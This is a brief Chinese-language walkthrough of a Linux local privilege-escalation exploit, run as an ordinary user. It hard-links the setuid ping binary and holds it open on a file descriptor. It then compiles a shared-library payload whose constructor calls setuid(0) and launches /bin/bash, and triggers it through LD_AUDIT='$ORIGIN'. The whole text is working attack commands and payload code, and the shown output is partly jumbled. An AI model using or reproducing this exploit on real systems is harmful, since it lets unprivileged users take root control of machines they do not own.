以普通用户 boy 作为测试对象，操作过程如下：
[boy@localhost ~]$ mkdir /tmp/exploit[boy@localhost ~]$ ln /bin/ping /tmp/exploit/target #使用ping命令的suid特性创建一个链接[boy@localhost ~]$ exec 3< /tmp/exploit/target #调用命令[boy@localhost ~]$ ls -l /proc/$$/fd/3lr-x------ 1 test test 64 Aug 17 21:41 /proc/35612/fd/3 -> /tmp/exploit/target[boy@localhost ~]$ rm -rf /tmp/exploit/[boy@localhost ~]$ ls -l /proc/$$/fd/3[boy@localhost ~]$ vim payload.c void __attribute__((constructor)) init()//在配置文件加入如下的内容{setuid(0);system("/bin/bash");}
[boy@localhost ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c[boy@localhost ~]$ ls -l /tmp/exploit[boy@localhost ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3